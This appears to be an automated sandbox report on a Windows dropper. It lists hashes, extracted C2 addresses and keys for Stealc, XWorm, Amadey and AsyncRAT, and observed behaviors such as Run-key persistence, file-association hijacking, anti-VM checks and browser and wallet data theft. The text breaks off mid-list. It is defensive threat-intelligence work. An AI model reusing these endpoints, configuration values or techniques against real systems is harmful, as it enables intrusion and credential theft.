Analysis
-
max time kernel
299s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
29-01-2024 12:18
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10-20231220-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral4
Sample
4363463463464363463463463.exe
Resource
win11-20231215-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276f6914c4.php
Extracted
xworm
91.92.249.37:9049
aMtkXNimPlkESDx9
Extracted
amadey
4.17
http://5.42.66.29
-
install_dir
f60f0ba310
-
install_file
Dctooux.exe
-
strings_key
f34f781563773d1d56ad6459936524d1
-
url_paths
/b9djjcaSed/index.php
Extracted
asyncrat
Default
38.181.25.204:5858
ifyviyeiimfgf
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
amadey
4.15
http://185.172.128.63
-
install_dir
6187fcb526
-
install_file
Dctooux.exe
-
strings_key
cd3b2619c9009c441355ae581d53163e
-
url_paths
/v8sjh3hs8/index.php
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Lumma Stealer payload V2 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe family_lumma_V2 -
Detect Lumma Stealer payload V4 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe family_lumma_v4 -
Detect Neshta payload 1 IoCs
Processes:
resource yara_rule C:\DRIVER~1\436346~1.EXE family_neshta -
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/2976-173-0x0000000000860000-0x0000000000876000-memory.dmp family_xworm C:\Users\Admin\AppData\Local\Temp\Files\first.exe family_xworm -
Detect ZGRat V1 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe family_zgrat_v1 -
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Process spawned unexpected child process 39 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4636 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4680 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1092 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 620 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 844 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 464 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3260 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3168 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1724 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2172 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1544 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4432 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2628 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3976 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3112 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3148 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3132 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2484 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1724 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4868 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1464 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3848 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4092 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4800 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4252 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2784 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4272 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1304 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1884 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3420 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4464 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2628 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2544 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3472 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2380 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2848 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5088 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 544 668 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4248 668 schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe family_redline C:\Users\Admin\AppData\Roaming\configurationValue\olehps.exe family_redline -
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/1636-187-0x000001DBD5A60000-0x000001DBD5A78000-memory.dmp asyncrat -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\fund.exe dcrat C:\Users\Admin\AppData\Local\Temp\Files\fund.exe dcrat C:\Users\Admin\AppData\Local\Temp\Files\fund.exe dcrat C:\DriverHostCrtNet\comSvc.exe dcrat C:\DriverHostCrtNet\comSvc.exe dcrat behavioral3/memory/3120-114-0x0000000000550000-0x0000000000716000-memory.dmp dcrat C:\Program Files\Uninstall Information\dwm.exe dcrat C:\Program Files\Uninstall Information\RCX85EE.tmp dcrat behavioral3/memory/3132-419-0x0000000000400000-0x00000000004CE000-memory.dmp dcrat C:\Program Files\Windows Security\BrowserCore\smss.exe dcrat C:\odt\WmiPrvSE.exe dcrat C:\DriverHostCrtNet\4363463463464363463463463.exe dcrat C:\DriverHostCrtNet\4363463463464363463463463.exe dcrat C:\DRIVER~1\436346~1.EXE dcrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
lada.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ lada.exe -
Blocklisted process makes network request 3 IoCs
Processes:
rundll32.exerundll32.exeWScript.exeflow pid process 123 6016 rundll32.exe 134 1796 rundll32.exe 200 1464 WScript.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
find.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts find.exe -
Stops running service(s) 3 TTPs
-
.NET Reactor proctector 10 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral3/memory/1732-929-0x0000000005870000-0x0000000005A15000-memory.dmp net_reactor behavioral3/memory/1732-931-0x0000000005870000-0x0000000005A15000-memory.dmp net_reactor behavioral3/memory/1732-935-0x0000000005870000-0x0000000005A15000-memory.dmp net_reactor behavioral3/memory/1732-939-0x0000000005870000-0x0000000005A15000-memory.dmp net_reactor behavioral3/memory/1732-941-0x0000000005870000-0x0000000005A15000-memory.dmp net_reactor behavioral3/memory/1732-944-0x0000000005870000-0x0000000005A15000-memory.dmp net_reactor behavioral3/memory/1732-946-0x0000000005870000-0x0000000005A15000-memory.dmp net_reactor behavioral3/memory/1732-948-0x0000000005870000-0x0000000005A15000-memory.dmp net_reactor behavioral3/memory/1732-950-0x0000000005870000-0x0000000005A15000-memory.dmp net_reactor behavioral3/memory/1732-952-0x0000000005870000-0x0000000005A15000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
lada.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion lada.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion lada.exe -
Checks computer location settings 2 TTPs 26 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
stub.exestub.exestub.exestub.exestub.exe4363463463464363463463463.exeOpolis.exestub.exeInstallSetup.exefirst.exestub.exedusers.exestub.exeWScript.exeDctooux.exeRegAsm.exestub.execmd.execmd.exeLogs.exesvchost.com15C633~1.EXEstub.exeUsers.exe4363463463464363463463463.exebuild1234.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation stub.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation stub.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation stub.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation stub.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation stub.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation Opolis.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation stub.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation InstallSetup.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation first.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation stub.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation dusers.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation stub.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation Dctooux.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation stub.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation Logs.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation svchost.com Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 15C633~1.EXE Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation stub.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation Users.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation build1234.exe -
Executes dropped EXE 64 IoCs
Processes:
crypted.exenetwora.exepowershell.exeConhost.exeInstallSetup.exeu3ts.0.exesvchost1.exeConhost.exefind.exei.exefirst.exeu3ts.1.exeofg7d45fsdfgg312.exedusers.exeUsers.exewmild.exewmild.exeama.exeminuscrypt_crypted.exewmild.exewmild.exe4363463463464363463463463.exewmild.exewmild.exeDctooux.exe4363463463464363463463463.exebaseline.exealex.exebuild1234.exeolehps.exeLogs.exeMachinegggg.exeTrueCrypt_lXNcTC.exeWatchDog.exeqemu-ga.exeOpolis.exelada.exeXMRig.exe2-3-1_2023-12-14_13-35.exeuwgxswmtctao.exeOSM-Client.exestub.exesvchost.exestub.exesvchost.exestub.exesvchost.exestub.exesvchost.comsvchost.comsvchost.comsvchost.com15C633~1.EXEstub.exesvchost.comstub.exesvchost.comtel.exesvchost.comfcc.exesvchost.comjjj.exesvchost.comstub.exepid process 4276 crypted.exe 2364 networa.exe 2224 powershell.exe 1332 Conhost.exe 4960 InstallSetup.exe 3968 u3ts.0.exe 1636 svchost1.exe 2948 Conhost.exe 3120 find.exe 4072 i.exe 2976 first.exe 3016 u3ts.1.exe 1356 ofg7d45fsdfgg312.exe 2876 dusers.exe 2648 Users.exe 244 wmild.exe 396 wmild.exe 1152 ama.exe 1692 minuscrypt_crypted.exe 2888 wmild.exe 1052 wmild.exe 5184 4363463463464363463463463.exe 5900 wmild.exe 5880 wmild.exe 4408 Dctooux.exe 5436 4363463463464363463463463.exe 1832 baseline.exe 1732 alex.exe 6108 build1234.exe 6036 olehps.exe 5584 Logs.exe 1592 Machinegggg.exe 2332 TrueCrypt_lXNcTC.exe 1676 WatchDog.exe 1680 qemu-ga.exe 5288 Opolis.exe 4980 lada.exe 4644 XMRig.exe 2644 2-3-1_2023-12-14_13-35.exe 5732 uwgxswmtctao.exe 3052 OSM-Client.exe 5788 stub.exe 5808 svchost.exe 1932 stub.exe 2004 svchost.exe 1016 stub.exe 380 svchost.exe 5448 stub.exe 5328 svchost.com 4280 svchost.com 2912 svchost.com 1652 svchost.com 5576 15C633~1.EXE 5900 stub.exe 3684 svchost.com 5376 stub.exe 3692 svchost.com 5168 tel.exe 2252 svchost.com 5968 fcc.exe 2784 svchost.com 3044 jjj.exe 1456 svchost.com 2628 stub.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
lada.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Wine lada.exe -
Loads dropped DLL 60 IoCs
Processes:
ama.exerundll32.exerundll32.exerundll32.exeOSM-Client.exepid process 1152 ama.exe 4488 rundll32.exe 6016 rundll32.exe 1796 rundll32.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe 3052 OSM-Client.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
stub.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" stub.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral3/memory/2648-266-0x0000000000400000-0x0000000000442000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\Files\Users.exe upx C:\Users\Admin\AppData\Local\Temp\Files\Users.exe upx behavioral3/memory/2876-313-0x0000000000400000-0x0000000000440000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe upx behavioral3/memory/2876-229-0x0000000000400000-0x0000000000440000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe upx behavioral3/memory/2648-351-0x0000000000400000-0x0000000000442000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
build1234.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build1234.exe Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build1234.exe Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build1234.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
first.exereg.exereg.exepowershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\first = "C:\\Users\\Admin\\AppData\\Roaming\\first.exe" first.exe Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winsvcr = "C:\\Users\\Admin\\AppData\\Roaming\\Macromedia\\svr.vbs" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winsvcr = "C:\\Users\\Admin\\AppData\\Roaming\\Macromedia\\svr.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\A_second_wind_for_important_cases = "C:\\Users\\Admin\\AppData\\Local\\A_second_wind_for_important_cases\\A_second_wind_for_important_cases.exe" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
Processes:
flow ioc 46 raw.githubusercontent.com 160 raw.githubusercontent.com 8 bitbucket.org 9 bitbucket.org 45 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 48 ip-api.com 157 ip-api.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\networa.exe autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
crypted.exelada.exepid process 4276 crypted.exe 4980 lada.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
minuscrypt_crypted.exeama.exealex.exeMachinegggg.exeTrueCrypt_lXNcTC.exeuwgxswmtctao.exetel.exejjj.exedescription pid process target process PID 1692 set thread context of 3132 1692 minuscrypt_crypted.exe AppLaunch.exe PID 1152 set thread context of 516 1152 ama.exe RegSvcs.exe PID 1732 set thread context of 1800 1732 alex.exe RegAsm.exe PID 1592 set thread context of 4920 1592 Machinegggg.exe ADelRCP.exe PID 2332 set thread context of 4260 2332 TrueCrypt_lXNcTC.exe jsc.exe PID 5732 set thread context of 1400 5732 uwgxswmtctao.exe explorer.exe PID 5168 set thread context of 5424 5168 tel.exe vbc.exe PID 3044 set thread context of 2612 3044 jjj.exe vbc.exe -
Drops file in Program Files directory 64 IoCs
Processes:
stub.exestub.exefind.exedescription ioc process File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE stub.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe stub.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe stub.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MICROS~4.EXE stub.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE stub.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE stub.exe File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE stub.exe File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe stub.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\1f93f77a7f4778 find.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe stub.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE stub.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE stub.exe File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe stub.exe File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe stub.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MI9C33~1.EXE stub.exe File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe stub.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe stub.exe File opened for modification C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE stub.exe File opened for modification C:\Program Files (x86)\Windows Mail\RCX9FD5.tmp find.exe File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe stub.exe File opened for modification C:\PROGRA~2\MOZILL~1\logs\MOUSOC~1.EXE stub.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe stub.exe File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE stub.exe File opened for modification C:\Program Files\Uninstall Information\dwm.exe find.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MI391D~1.EXE stub.exe File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE stub.exe File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE stub.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE stub.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe stub.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE stub.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe stub.exe File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE stub.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE stub.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE stub.exe File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe stub.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe stub.exe File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe stub.exe File opened for modification C:\Program Files (x86)\Windows Mail\RCX9FD4.tmp find.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\RCX9B4D.tmp find.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe stub.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe stub.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE stub.exe File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE stub.exe File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE stub.exe File created C:\Program Files (x86)\Windows Mail\networa.exe find.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe find.exe File opened for modification C:\PROGRA~3\PACKAG~1\{FB050~1\WINDOW~1.EXE stub.exe File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE stub.exe File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe stub.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe stub.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe stub.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MICROS~1.EXE stub.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe stub.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE stub.exe File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE stub.exe File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe stub.exe File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE stub.exe File created C:\Program Files\Uninstall Information\dwm.exe find.exe File opened for modification C:\Program Files\Uninstall Information\RCX85EE.tmp find.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe stub.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE stub.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE stub.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE stub.exe File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe stub.exe -
Drops file in Windows directory 57 IoCs
Processes:
stub.exesvchost.comstub.exesvchost.comstub.exesvchost.comsvchost.comstub.exesvchost.comsvchost.comstub.exeConhost.exefind.exestub.exesvchost.comstub.exesvchost.comsvchost.comsvchost.comstub.exesvchost.comsvchost.comsvchost.comsvchost.comstub.exestub.exestub.exestub.exestub.exedescription ioc process File opened for modification C:\Windows\directx.sys stub.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com stub.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com stub.exe File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File created C:\Windows\svchost.exe stub.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com stub.exe File opened for modification C:\Windows\directx.sys stub.exe File opened 